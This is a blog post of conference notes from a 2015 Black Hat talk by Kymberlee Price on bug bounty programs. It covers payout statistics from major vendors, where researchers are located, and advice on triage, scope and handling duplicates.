Thursday, August 6, 2015

BHUSA15: Hi This Is Urgent Plz Fix ASAP: Critical Vulnerabilites and Bug Bounty Programs

Kymberlee Price, Bugcrowd.(aka @kym_possible)

We won't be talking about low level bug bounty programs today, just the critical bugs. Kyberlee has extensive background as a developer and has been working lately on a "red team".

Google does a vulnerability reward program (VRP) that they produce some data one. It doesn't include the Chrome award, Android award, or patch award program - but it includes logs of other things! Google.com, google play, etc.  

The more time that passes, the fewer vulnerability reports that come in - but seems to be higher quality. Google has had to increase their bounty to keep the bugs coming in.

Facebook has a similar program and had 17,000 submissions in 2014 alone. Out of that, onlyl 61 high severity bugs. Their minimum award is $500.  Their total payout for valid submissions wwas $1.3 million to 321 researchers. Their top 5 researchers made a total of $256,750 - those had to be massive vulnerabilities.

India is Facebook's highest valid bug submissions, with Egypt coming in second - and USA in third place.  In India, the average payout was $1343, in Egypt $1220 and US $2470.

Github's bug bounty program is 1 year old today!

Microsoft will pay up to $100,000 for novel exploitation techniques against protections built into the OS, and an additional reward of up to $100,000 if you also develop a defense.

MS runs a "hall of fame" - which indicates you received a bounty. If your vuln results in a CVE, you'll be noted in the security alert.

Depending on whether it software or online services will change who is submitting your bugs (like India is very high for MS's online services, but not as many for software.

Followed 166  customer bug bounty programs, there were 37,227. There wer about eight thousand non-duplicate, valid vulnerabilities. Of those 3, 621 were awarded - paying out $700,00+ (average payout around $200, largest $10,000).

Every one of these programs is getting really critical vulnerabilities.

Who is finding these?  Professional Pen Testers and consultants (in their spare time), former developers, QA engineers and IT admins.

India, US and Pakistan are top three for volume of submissions.

Reginaldo Silva reported an XML external entity vulnerability within a PhP page tha would have allowed a hacker to change Facebook's use of Gmail as an OpenID provider to a hacker-controlled URL, before servicing requests with malicious XML codes. Fixed quickly and the developer was rewarded and recognized.

Kymberlee then did a deep dive into a few of these fun (and very serious) vulnerabilities found, even including videos and audio from the researchers who found these themselves. These vulnerabilities were things like banks and cars!

You need to make sure you tell researchers in advance what you need to help you triage it faster (this can be email or webform). Set expectations, but you need to have a rapid triage and prioritization process in place (to get to the P1s faster).

Now, don't expect an eloquent write up - English may not be their first language. Allow them to provide a video of the reproduction steps.

You need to have  your "in scope" and "out of scope" clearly defined, and a process for how to handle things that don't fit into either category (because they weren't defined well enough - it will happen).

To reduce noise, provide pointers to guidance and training, like Bugcrowd's forum.

Have a plan to deal with duplicates. Don't see this often for P1 or P2, because those are fixed quickly.  Don't let the lower priority bugs languish, either. If they are getting reported over and over again, you're wasting resources telling the researchers they have hit a duplicate - and if researchers are finding this every week, so are the bad guys.

 Some of the bugs can be so severe that they are worth the entire program. You don't want those vulnerabilities out there.

How to reduce noise? Publish and stick to your program SLA. Stop rewarding bad behavior (ie don't give someone "hall of fame" acknowledgement just because they are pestering you).  Don't create bad behaviour by being consistent, rewarding quickly, having good documentation.

By crowdsourcing this, you can bring people from around the world into your security team - people who cannot or do not attend conferences like Black Hat, etc.

This was a really fascinating and informative presentation!